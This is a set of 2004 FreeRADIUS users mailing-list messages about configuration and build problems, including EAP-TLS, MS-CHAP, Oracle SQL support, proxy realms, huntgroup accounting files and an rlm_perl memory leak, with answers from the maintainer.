Unable to start Radius server with TLS configuration.
Dear team, I was working with radius server configured with TLS , following the HOW-TO written by Raymond McKay. While starting the server, a error rlm_eap: Failed to link EAP-Type/tls: file not found comes. Does anyone can help me how to solve this problem and start the server. -- Regards, S.Suresh Babu ' You must be the change you wish to see in the world.' -M.K.Gandhi. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Normal one-time password at the same time
Thor Spruyt wrote: I would like to implement OTP (one-time password) and I tried to add a seconds record with the User-Password attribute for each user in radcheck. It seems that FreeRadius only allows the user if he enters the password from the record with the highest id. Are there any possibilities to do such thing for OTPs, so that the user can either login with his real password or with his OTP? I now found a way that seems to work. I created an additional sql { } and added it to the authorize section. The seems to work, but I'm wondering if it's a good way to do this or are there better ways? -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: new sqlcounter counter
Hello, please advice on rlm_sql counter module. If i want to check not only after User-Name attribute when giving Max-All-Session to some user but also after NAS-IP-Address, what should i change in sqlcounter.conf? Currently i have default values as described in the doc file. Edgars Edgars wrote: can someone assist with creating a new attribute named Hours-Counter. So, for example, if i will set this attribute for user to 1 hour then he would login/logout during this time as many times as want (it's possible also that he doesn't login) but after 1h the access to this username will be disabled. So i added this to sqlcounter.conf file,but sticked on the query line. Please can someone write this query for me? sqlcounter hours { counter-name=Hours-Counter check-name=Hours sqlmod-inst=sqlcca3 key=User-Name reset=never query= } Thank you! Edgars - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Ntlm problem with peap
Hi, Running 1.0.0 on dual intel so little-endian. Aparently challenge or nt-response are being generated wrongly, or it's a bug in ntlm_auth. rpm -qif /usr/bin/ntlm_auth Name: samba-common Version : 3.0.2 Any ideias? Is there any workaround to have peap with mschapv2 working without ntlm? Thanks Nuno Fernandes On Mon, 2004-08-30 at 19:43, Alan DeKok wrote: Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: I'm having problems using freeradius with peap and ntlm. If you're running on a big endian machine, there's a bug in src/lib/md4.c which breaks MS-CHAP, and therefore PEAP. We hope to release 1.0.1 soon, to address this issue. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Nuno Miguel Pais Fernandes [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
How does one compile pam-radius auth???
I have copied the downloaded files to: src/pam-radius and I modified the Makefile in src to include the directory pam-radius. When I run make I get the following (see below)... If I don't include the pam-radius in the overall build radius appears tobuild correctly. Thanks, Roger gmake[4]: Entering directory `/root/freeradius-1.0.0/src/pam-radius' cc -Wall -fPIC -c pam_radius_auth.c -o pam_radius_auth.o In file included from pam_radius_auth.c:63: pam_radius_auth.h:22:20: radius.h: No such file or directory In file included from pam_radius_auth.h:23, from pam_radius_auth.c:63: /usr/include/md5.h:27: error: syntax error before UINT4 /usr/include/md5.h:30: error: syntax error before '}' token /usr/include/md5.h:38: error: syntax error before PROTO_LIST /usr/include/md5.h:39: error: syntax error before PROTO_LIST /usr/include/md5.h:41: error: syntax error before PROTO_LIST /usr/include/md5.h:43: error: syntax error before PROTO_LIST pam_radius_auth.c:163: error: syntax error before ipstr2long pam_radius_auth.c:163: warning: return type defaults to `int' - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: freeradius 1.0.0 crashes on oracle errors
Hello. I see a lot of 1401 errors in radiusd.log. But they does not lead to core dumps. Radiusd performs correctly. These errors come when users supply incorrect usernames those are longer than the username column size. We work on SPARC Solaris 2.8, gcc 3.3, Oracle 9.2.0.5, freeradius-1.0.0.. Kostas Zorbadelos [EMAIL PROTECTED] wrote: My environment is Solaris 2.8, gcc 2.95.3, Oracle 8.1.7. Freeradius crashes (and core dumps) after an sql query causes an error with an Oracle backend database. Yuck. First of all in oraclesql.conf there is a typo in accounting_start_query_alt query: Fixed, thanks. Secondly, I caused the crash by sending an accounting start packet with very large acct-session-id, that caused an ORA-01401(: inserted value too large for column) error. Ok. The server *should* be robust in the face of such errors. Should I submit a bug report in bugs.freeradius.org? Please. For anything else you might need to trace the error, please let me know. A gdb 'bt', so we can see where/when the error occured. If you have access to a Linux box, you can try running it under valgrind, which should give you more information about the invalid memory accesses. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Accounting issue
On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote: Erik Immers [EMAIL PROTECTED] wrote: Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS. You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf. The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the nasses log to 1 detail file, end the other half to another detail file. As far as i see it is only possible to, or put everything in 1 detail file, or every nas in its own detail file. The only option i can think of is to do something with the huntgroup name, but i dont see any option to put that into the detail section of radiusd. Might it be possible to create an variable in the users file to use that in the radiusd.conf, or something that will give me the same result. Example : add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in the radiusd.conf users file steve Auth-Type := Local, User-Password == testing Service-Type = Framed-User, Framed-Protocol = PPP, Framed-IP-Address = 172.16.3.33, Framed-IP-Netmask = 255.255.255.0, Framed-Routing = Broadcast-Listen, Framed-Filter-Id = std.ppp, Framed-MTU = 1500, Framed-Compression = Van-Jacobsen-TCP-IP, HUNTGROUP-NAME=com21 /users file radiusd.conf detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME} /radiusd.conf Sorry if my explanation isnt all that clear. Erik Immers Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
proxying / realms / users file
Hallo once more, I don't want to annoy you, hopefully I'm getting closer... Alan DeKok wrote: Is local or system the correct value to forward requests by using realm NULL? Neither. First, is the realm NULL the preferred method to forward requests to another radius server? If so, I still need to figure out how to use it. After searching the mailing list archive I found a hint: DEFAULT Proxy-To-Realm := foo.com Is that how it works? Not with any Auth-Type? Does this also work if the username doesn't contain that realm? I tried with this users file: DEFAULT Auth-Type := LDAP DEFAULT Proxy-To-Realm := students and this proxy.conf: realm students { type= radius authhost= uml1:1812 accthost= uml1:1813 secret= hidden } But then no requests are forwarded. The output of radiusd -X just shows rlm_realm: No '@' in User-Name = ben1812, looking up realm NULL rlm_realm: No such realm NULL which is correct, of course. But if I use this configuration... DEFAULT Auth-Type := LDAP DEFAULT Proxy-To-Realm := NULL and this proxy.conf: realm NULL { type= radius authhost= uml1:1812 accthost= uml1:1813 secret= hidden } ... FR forwards all requests and rejects users that are in the local ldap. (That's my very problem.) Just like without Proxy-To-Realm. Apart from that, the doc file proxy says that the users file is being processed after the proxying. Does this mean that I don't have to configure the proxying in the users file at all? If I'm completely wrong again could you please give me hints where to search or what to look for? Thanks for your patience and helpfullness. Benedikt Panzer - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: help with rlm_sql_oracle
On Tue, Aug 31, 2004 at 09:42:42AM +0300, Ivan wrote: It should be possible to compile freeradius oracle support with the oracle client installed only. I also had various problems with 9.2 oracle client (on my debian system) so I installed oracle client 8.1.7 rel3. If you set the ORACLE_HOME environment variable in the configure of freeradius, it should detect and build the oracle module without problems. Dear FreeRadius.org comunity, We`ve got a problem during installation of FreeRadius server 1.0.0 for use with the Oracle database on FreeBSD. The next sample of the config.log file illustrates our problem: orabsd# ./configure . configuring in ./drivers/rlm_sql_oracle running /bin/sh ./configure --enable-ltdl-install --enable-ltdl-install --cache-file=../../../../.././config.cache --srcdir=. loading cache ../../../../.././config.cache checking for gcc... (cached) gcc checking whether the C compiler (gcc -g -O2 -pthread -D_THREAD_SAFE -DOPENSSL_NO_KRB5 -Wall -D_GNU_SOURCE -DNDEBUG ) works... yes checking whether the C compiler (gcc -g -O2 -pthread -D_THREAD_SAFE -DOPENSSL_NO_KRB5 -Wall -D_GNU_SOURCE -DNDEBUG ) is a cross-compiler... no checking whether we are using GNU C... (cached) yes checking whether gcc accepts -g... (cached) yes checking how to run the C preprocessor... (cached) gcc -E checking for oci.h... no configure: warning: oracle headers not found. Use --with-oracle-home-dir=path. configure: warning: sql submodule 'oracle' disabled updating cache ../../../../.././config.cache creating ./config.status creating Makefile . As you see, we can`t compile the rlm_sql_oracle driver. We were trying to install the FreeRadius server on a PC with Oracle client for FreeBSD 4.10-5.2.1(we tried different releases of FreeBSD). We tried to do the following steps: 1. ./configure --with-oracle-home-dir=path to the oracle client directory ./configure --disable-shared --with-oracle-home-dir=path to the oracle client directory 2. ./configure --with-oracle-lib-dir=path to the oracle client lib directory, to the /rdbms/demo directory ./configure --disable-shared --with-oracle-lib-dir=path to the oracle client lib directory, to the /rdbms/demo directory 3. we also tried to compile the rlm_sql_oracle driver alone in the installation directory of the oracle client, but with no result. Is it possible to install the FreeRadius server with oracle support on a PC just with oracle client installed (without basic installation of the Oracle database. we use a separate database server with Oracle 9.2i)? If yes, then wich directory must contain the oracle client lib files? If it`s not possible, then will it be possible to connect to the oracle database located on a remote PC? Hope to hear from you soon with best regards, Ivan and Valery mailto:[EMAIL PROTECTED] - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Kostas Zorbadelos Currently at: Otenet IT Department mailto: [EMAIL PROTECTED] Out there in the darkness, out there in the night out there in the starlight, one soul burns brighter than a thousand suns. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: freeradius 1.0.0 crashes on oracle errors
On Tue, Aug 31, 2004 at 12:35:18PM +0400, Alexander Serkin wrote: Hello. I see a lot of 1401 errors in radiusd.log. But they does not lead to core dumps. Radiusd performs correctly. These errors come when users supply incorrect usernames those are longer than the username column size. We work on SPARC Solaris 2.8, gcc 3.3, Oracle 9.2.0.5, freeradius-1.0.0.. Hmmm. I have a different compiler version and older Oracle version (8.1.7). Have you tried to cause the 1401 error continously and not sporadically? You can do that with radclient. Anyway I will submit a bug report with the gdb output. Kostas Zorbadelos [EMAIL PROTECTED] wrote: My environment is Solaris 2.8, gcc 2.95.3, Oracle 8.1.7. Freeradius crashes (and core dumps) after an sql query causes an error with an Oracle backend database. Yuck. First of all in oraclesql.conf there is a typo in accounting_start_query_alt query: Fixed, thanks. Secondly, I caused the crash by sending an accounting start packet with very large acct-session-id, that caused an ORA-01401(: inserted value too large for column) error. Ok. The server *should* be robust in the face of such errors. Should I submit a bug report in bugs.freeradius.org? Please. For anything else you might need to trace the error, please let me know. A gdb 'bt', so we can see where/when the error occured. If you have access to a Linux box, you can try running it under valgrind, which should give you more information about the invalid memory accesses. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Kostas Zorbadelos Currently at: Otenet IT Department mailto: [EMAIL PROTECTED] Out there in the darkness, out there in the night out there in the starlight, one soul burns brighter than a thousand suns. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Unable to start radius server with TLS configurations
Dear team, I was working with radius server configured with TLS , following the HOW-TO written by Raymond McKay. While starting the server, a error rlm_eap: Failed to link EAP-Type/tls: file not found comes. Does anyone can help me how to solve this problem and start the server. -- Regards, S.Suresh Babu ' You must be the change you wish to see in the world.' -M.K.Gandhi. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
proxy support for RFC3576 disconnect requests?
Hi, does freeradius support proxying requests messages as defined in RFC3576, especially the ones mentioned in 2.1. Disconnect Messages? Or does anybody know another radius implementation that supports this? I couldn't find anything about this on the web-site, FAQ, changelog and list-archive. Thanks. Ulf -- Supergünstige DSL-Tarife + WLAN-Router für 0,- EUR* Jetzt zu GMX wechseln und sparen http://www.gmx.net/de/go/dsl - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Normal one-time password at the same time
Thor Spruyt wrote: I now found a way that seems to work. I created an additional sql { } and added it to the authorize section. The seems to work, but I'm wondering if it's a good way to do this or are there better ways? Huh... I found something nice accidentally... rlm_sql_postgresql: query: SELECT id, UserName, Attribute, Value, Op ??FROM radcheck2 ??WHERE Username = 'thor' ??ORDER BY id rlm_sql_postgresql: Status: PGRES_TUPLES_OK rlm_sql_postgresql: affected rows = rlm_sql: The 'op' field for attribute 'User-Password = xxx' is NULL, or non-existent. rlm_sql: You MUST FIX THIS if you want the configuration to behave as you expect. So leaving the op field empty will result in FreeRadius trying to match both retrieved passwords! Am I doing something stupid here? -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Normal one-time password at the same time
Thor Spruyt wrote: So leaving the op field empty will result in FreeRadius trying to match both retrieved passwords! Am I doing something stupid here? Never mind... it doesn't work :( -- Regards, Thor Spruyt E: [EMAIL PROTECTED] W: www.thor-spruyt.com M: +32 (0)475 67 22 65 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
MS-CHAP can't work
Can any one help me? I try to create the PPTP connection to CISCO router, and it seems be working fine if I use local authentication on cisco. If I try to authenticateto FreeRadius with MS-CHAP, it still hard to work after trying long time. rlm_mschap: No LM/NT password configured. Check authorization. modcall[authenticate]: module "mschap" returns invalidmodcall: group authtype returns invalidauth: Failed to validate the user. Who can comment what's happen? Thank you very much!!! Configuation and the error messages show on the below. username cisco password cisco vpdn-group 2! Default PPTP VPDN groupaccept-dialin protocol pptp virtual-template 2local name vpdnpptp tunnel echo 0pptp flow-control receive-window 64 interface Virtual-Template2ip unnumbered FastEthernet0/0peer default ip address pool pptp-poolppp max-bad-auth 4ppp encrypt mppe autoppp authentication ms-chap-v2 users file test Auth-Type := MS-CHAP, User-Password = "test" ( test Auth-Type := MS-CHAP,NT-Password = "$1$m8QDPK4O$.rEj97XgPB/FVHCb2BTNy0" ) also failed radiusd.confmodule mschap { # Location of the SAMBA passwd file # #passwd = /etc/smbpasswd authtype = MS-CHAP use_mppe = yes require_encryption = yes require_strong = yes } authorize { preprocess mschap suffix files } authenticate { authtype CHAP { chap } authtype MS-CHAP { mschap } } rad_recv: Access-Request packet from host 202.145.138.34:1645, id=201, length=160 Framed-Protocol = PPP User-Name = "test" MS-CHAP-Challenge = 0xb41e91a9541c4577966546a55c7cc157 MS-CHAP2-Response = 0x02043146e52dbbb11f22672e6d1307329d5a46271c1c2b3aa7d159847e01970656a58c9a61fdefdc NAS-Port-Type = Virtual Cisco-NAS-Port = "Uniq-Sess-ID87" NAS-Port = 87 Service-Type = Framed-User NAS-IP-Address = 202.145.138.34modcall: entering group authorize modcall[authorize]: module "preprocess" returns ok modcall[authorize]: module "mschap" returns notfound rlm_realm: No '@' in User-Name = "test", looking up realm NULL rlm_realm: No such realm NULL modcall[authorize]: module "suffix" returns noop users: Matched DEFAULT at 8 modcall[authorize]: module "files" returns okmodcall: group authorize returns ok rad_check_password: Found Auth-Type MS-CHAPauth: type "MS-CHAP"modcall: entering group authtype rlm_mschap: No LM/NT password configured. Check authorization. modcall[authenticate]: module "mschap" returns invalidmodcall: group authtype returns invalidauth: Failed to validate the user. Delaying request 1 for 1 secondsFinished request 1Going to the next request--- Walking the entire request list ---Waking up in 1 seconds...--- Walking the entire request list ---Waking up in 1 seconds...--- Walking the entire request list ---Sending Access-Reject of id 201 to 202.145.138.34:1645 MS-CHAP-Error = "\002E=691 R=1"Waking up in 4 seconds...--- Walking the entire request list ---Cleaning up request 1 ID 201 with timestamp 413448bbNothing to do. Sleeping until we see a request. Davis Bai.Tel: 886-2-87883728 Ext. 540Fax: 886-2-27881581Email : [EMAIL PROTECTED] ADSL [+]$4399, "", !!http://www.ttn.com.tw/wlan , http://www.ttn.net; TTN, 0800-093-636 This message (and any attachments) may contain information that is confidential, proprietary, privileged or otherwise protected by law. The message is intended solely for the named addressee (or a person responsible for delivering it to the addressee). If you are not the intended reciptient of this message, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please destroy the message or delete it from your system immediately and notify the sender.()[EMAIL PROTECTED]() inline: ttn1.jpg
Re: Works but not working
Alan DeKok wrote: Beast [EMAIL PROTECTED] wrote: OK, these was debug log, one for PAP and one for MSCHAPv2. Once loging in into VPN, client pinging some host, works with PAP but not with MSCHAP. In both cases you haven't given any additional reply attributes to the NAS. I don't know why MS-CHAP works, but I'll bet that the NAS is What is minimal reply attributes needed for MSCHAP to works? looking for certain RADIUS attributes in the response, and you're not telling the server to send them. Sniffing radius packet might help? Any recomended packet sniffer which able to parse radius output? Alan DeKok. -- --beast - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Works but not working
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
1.0.0. Problems with check-radiusd-config and rlm_perl
Hello! Just now upgrade to 1.0.0. All works fine except check-radiusd-config and rlm_perl. 1. check-radiusd-config doesn't work with 1.0.0. because -p option is deprecated. why? IMHO, check-radiusd-config is userfull, when need to check new config while working instance is running. So option -p have to be (IMHO). 2. There is memory leak in rlm_perl.c again. I had memory leak before Jul,12. After installing rlm_perl from snapshot leak leaves me. I don't know what version is exactly. there was line * Version:$Id: rlm_perl.c,v 1.13 2004/02/26 19:04:34 aland Exp $ in source. The line is the same in 1.0.0 verion, but files looks differ. diff -u rlm_perl.c-jul-12 rlm_perl.c-from_1.0.0 shows: = @@ -40,6 +40,10 @@ #undef INADDR_ANY #endif +#ifdef INADDR_NONE +#undef INADDR_NONE +#endif + #include EXTERN.h #include perl.h #include XSUB.h @@ -48,39 +52,6 @@ static const char rcsid[] = $Id: rlm_perl.c,v 1.13 2004/02/26 19:04:34 aland Exp $; -#ifdef USE_ITHREADS - -/* - * Pool of Perl's clones (genetically cloned) ;) - * - */ -typedef struct pool_handle { - struct pool_handle *next; - struct pool_handle *prev; - enum {busy, idle} status; - unsigned intrequest_count; - PerlInterpreter *clone; - perl_mutex lock; -} POOL_HANDLE; - -typedef struct PERL_POOL { - POOL_HANDLE *head; - POOL_HANDLE *tail; - - int current_clones; - int active_clones; - int max_clones; - int start_clones; - int min_spare_clones; - int max_spare_clones; - int max_request_per_clone; - int cleanup_delay; - enum {yes,no} detach; - perl_mutex mutex; - time_t time_when_last_added; -} PERL_POOL; - -#endif skip = When i run radiusd, it consumes about 60MB of RAM. after 15 minutes - about 200MB. And it grows. previous version consume 55-70MB even after few days. So i think, there is memory leak again. Sincerely, Mike. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: 1.0.0. Problems with check-radiusd-config and rlm_perl
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
RE: Accounting issue
Hunt groups are defined in huntgroups file like: huntgroups COM21 NAS-IP-Address = 192.168.1.1 Cisco-Gateway-Id = COM21 COM22 NAS-IP-Address = 192.168.2.1 NAS-IP-Address = 192.168.2.2 /huntgroups The Huntgroup-Name attribute will be appended automatically. -Message d'origine- De : [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] De la part de Erik Immers Envoyé : mardi 31 août 2004 10:34 À : [EMAIL PROTECTED] Objet : Re: Accounting issue On Mon, Aug 30, 2004 at 10:36:56AM -0400, Alan DeKok wrote: Erik Immers [EMAIL PROTECTED] wrote: Is there within freeradius (0.8.1) the possibility to log to 2 detail files depending on the NAS. You should upgrade to 1.0.0. And the detail file is configurable. See the comments in radiusd.conf. The comments indeed speak of a configurable detail file. But what we want to achieve is that one half of the nasses log to 1 detail file, end the other half to another detail file. As far as i see it is only possible to, or put everything in 1 detail file, or every nas in its own detail file. The only option i can think of is to do something with the huntgroup name, but i dont see any option to put that into the detail section of radiusd. Might it be possible to create an variable in the users file to use that in the radiusd.conf, or something that will give me the same result. Example : add the variable HUNTGROUP-NAME to the users file, and add it to the detail section in the radiusd.conf users file steve Auth-Type := Local, User-Password == testing Service-Type = Framed-User, Framed-Protocol = PPP, Framed-IP-Address = 172.16.3.33, Framed-IP-Netmask = 255.255.255.0, Framed-Routing = Broadcast-Listen, Framed-Filter-Id = std.ppp, Framed-MTU = 1500, Framed-Compression = Van-Jacobsen-TCP-IP, HUNTGROUP-NAME=com21 /users file radiusd.conf detailfile = ${radacctdir}//detail-${HUNTGROUP-NAME} /radiusd.conf Sorry if my explanation isnt all that clear. Erik Immers Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Accounting issue
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
short password field from lucent stingers
hi - we're seeing a Lucent Stinger device sending radius requests with a passowrd field that is less than the 16 octets as per protocol. now, some radius servers seem not to like this - but freeradius seems to work fine with this. i suspect that is because freeradius either ignores the length of that field, or copies it to a zero-padded buffer. am i right? see section of an email below for details... tariq - have the Password and Chap-Password fields with 16 and 17 octects respectively - as seen in the trace 5 logs. This is as per protocol. however, the problem stinger seems to send short passwords such as : Password = 249!1931236170172 Password = 2527217213237134130 Password = 249!1931236170172 and so on .. these are less than the normal: Password = 215y1601F224193187OM'0222197227 - 16 octects CHAP-Password = 1193202t18613624147145210n233.{9!; - 17 octects is this evidence that the problem lucent stinger is malforming its packets? or are there valid cases when the Password field is short? - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: short password field from lucent stingers
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Unable to start Radius server with TLS configuration.
sureshbabu [EMAIL PROTECTED] wrote: While starting the server, a error rlm_eap: Failed to link EAP-Type/tls: file not found comes. Does anyone can help me how to solve this problem and start the server. Did you check if the module exists at *all* on your system? Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Unable to start Radius server with TLS configuration.
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Ntlm problem with peap
Nuno Miguel Pais Fernandes [EMAIL PROTECTED] wrote: Running 1.0.0 on dual intel so little-endian. Aparently challenge or nt-response are being generated wrongly, or it's a bug in ntlm_auth. I've been running it on an x86 for a while, and I haven't seen any problems like that. Any ideias? Is there any workaround to have peap with mschapv2 working without ntlm? Yes, supply a clear-text, or NT-Password. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How does one compile pam-radius auth???
roger weiss [EMAIL PROTECTED] wrote: I have copied the downloaded files to: src/pam-radius and I modified the Makefile in src to include the directory pam-radius. Why? If I don't include the pam-radius in the overall build radius appears tobuild correctly. Why are you including pam-radius in the freeradius build? I don't understand what you're doing, or why you think it's necessary. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Ntlm problem with peap
I will be away on holidays until September 2. Should you require immediate assistance, please contact Rod MacLeod or George Gauthier. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Bug/security EAP-TLS
Joey Nix [EMAIL PROTECTED] wrote: So will it be: case handshake: if (tls_session-info.handshake_type == finished) { DEBUG2( rlm_eap_tls: ack handshake is finished); return EAPTLS_SUCCESS; } DEBUG2( rlm_eap_tls: ack handshake fragment handler); /* Fragmentation handler, send next fragment */ return EAPTLS_REQUEST; Yes. or will it be: case handshake: if (tls_session-info.handshake_type == finished) { DEBUG2( rlm_eap_tls: ack handshake is finished); return EAPTLS_SUCCESS; } default: DEBUG2( rlm_eap_tls: ack default); radlog(L_ERR, rlm_eap_tls: Invalid ACK received: %d, No. That would make it impossible for multi-ack sessions to work, and would require that everything be sent in only one SSL packet. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: proxying / realms / users file
Benedikt Panzer [EMAIL PROTECTED] wrote: First, is the realm NULL the preferred method to forward requests to another radius server? That depends on your system. If so, I still need to figure out how to use it. After searching the mailing list archive I found a hint: DEFAULT Proxy-To-Realm := foo.com Is that how it works? Not with any Auth-Type? Yes. The home server authenticates the user. FreeRADIUS *could* have Auth-Type = Proxy, but that would be pointless. Does this also work if the username doesn't contain that realm? Yes. I tried with this users file: DEFAULT Auth-Type := LDAP DEFAULT Proxy-To-Realm := students You're telling the server to use LDAP *always*, and to *never* proxy the request. Please read the man page for the users file. But if I use this configuration... DEFAULT Auth-Type := LDAP DEFAULT Proxy-To-Realm := NULL and this proxy.conf: realm NULL { type= radius authhost= uml1:1812 accthost= uml1:1813 secret= hidden } ... FR forwards all requests and rejects users that are in the local ldap. (That's my very problem.) Just like without Proxy-To-Realm. At this point, I don't believe you. Or, the configuration you quoted above is NOT what you're actually running. You've re-typed it, rather than quoting it, and what you've posted here is NOT what is running in your server. If you don't describe your system accurately, it's impossible to help you. Apart from that, the doc file proxy says that the users file is being processed after the proxying. Does this mean that I don't have to configure the proxying in the users file at all? No. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: proxy support for RFC3576 disconnect requests?
Ulf Bremer [EMAIL PROTECTED] wrote: does freeradius support proxying requests messages as defined in RFC3576, especially the ones mentioned in 2.1. Disconnect Messages? Or does anybody know another radius implementation that supports this? No open source server supports this that I know of. FreeRADIUS doesn't support this, but it wouldn't be too hard to add: - add a new RAD_LISTEN type - update packet_ok() to handle the new type, and return a new function pointer - update src/main/mod*, to handle a new sub-section And the hard part: update all of the modules to have disconnect send/receive sections. Most of it is fairly simple editing from the existing templates... increasing the size of data structures, etc. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: MS-CHAP can't work
=?big5?B?QmFpIKXVqXalTg==?= [EMAIL PROTECTED] wrote: If I try to authenticate to FreeRadius with MS-CHAP, it still hard to work after trying long time. rlm_mschap: No LM/NT password configured. Check authorization. modcall[authenticate]: module mschap returns invalid ... Who can comment what's happen? Thank you very much!!! You have to tell the server what password to use to authenticate the user. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Works but not working
Beast [EMAIL PROTECTED] wrote: What is minimal reply attributes needed for MSCHAP to works? Uh, no. looking for certain RADIUS attributes in the response, and you're not telling the server to send them. Sniffing radius packet might help? Uh, no. Please read your VPN documentation to see what attributes it needs in order for it to allow users to access the net. Then, configure FreeRADIUS to send those attributes. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Freeradius 1.0 + Cisco 2950 + PAM auth problem
Hi all, I have Freeradius 1.0 running on Linux. Users file contains only Default Auth-Type = PAM, Clients file contains my whole subnet. I'd like to use it for 802.1x authentication with Cisco 2950 switch. Radius config is OK - radtest launched from a server, using Cisco switch's secret key works fine. But when I try to authorize the computer (MacOS X) using built-in 802.1x supplicant, I receive the following error: attribute user password is required for authentication. It seems like the switch doesn't pass my user password towards radius server in authentication request... Radius-related entries in switch config: aaa new-model aaa authentication dot1x default group radius radius-server host my.local.ip.address auth-port 1812 acct-port 1813 radius-server retransmit 3 radius-server key mytestingkey Any ideas how to make it work? MacOS X supplicant offers different authentication protocols, like: TTLS, TLS, LEAP, PEAP, MD5. Does it have something in commont with my problem? Thanks in advance for your help. Best regards Bartek Boczkaja - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: 1.0.0. Problems with check-radiusd-config and rlm_perl
[EMAIL PROTECTED] wrote: 1. check-radiusd-config doesn't work with 1.0.0. because -p option is deprecated. why? IMHO, check-radiusd-config is userfull, when need to check new config while working instance is running. So option -p have to be (IMHO). The intent is to move to a better way of checking the configuration. i.e. like having the server re-load it's configuration files into a temporary structure, and then revert to the existing configuration if there's a problem reading teh new one. 2. There is memory leak in rlm_perl.c again. I had memory leak before Jul,12. After installing rlm_perl from snapshot leak leaves me. Hmm OK. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: short password field from lucent stingers
ariq Rashid [EMAIL PROTECTED] wrote: hi - we're seeing a Lucent Stinger device sending radius requests with a passowrd field that is less than the 16 octets as per protocol. Welcome to vendor implementations... now, some radius servers seem not to like this - but freeradius seems to work fine with this. i suspect that is because freeradius either ignores the length of that field, or copies it to a zero-padded buffer. It uses the length of the password. See src/lib/radius.c, rad_pwdecode(). It explicitly checks if the password is smaller than 16 characters, and has a few lines of code to ensure that those passwords work. The code was added to deal with NASes like the Lucent one. am i right? see section of an email below for details... is this evidence that the problem lucent stinger is malforming its packets? Yes. or are there valid cases when the Password field is short? No. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius 1.0 + Cisco 2950 + PAM auth problem
Bartek Boczkaja [EMAIL PROTECTED] wrote: I have Freeradius 1.0 running on Linux. Users file contains only Default Auth-Type = PAM, Clients file contains my whole subnet. I'd like to use it for 802.1x authentication with Cisco 2950 switch. It's impossible. PAM needs a clear-text password for authentication, and no such clear-text password exist in EAP. Any ideas how to make it work? MacOS X supplicant offers different authentication protocols, like: TTLS, TLS, LEAP, PEAP, MD5. Does it have something in commont with my problem? Give the server a clear-text password, and it can use that to authenticate the EAP requests. And no, you can't use PAM to get clear-text passwords. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Accounting issue
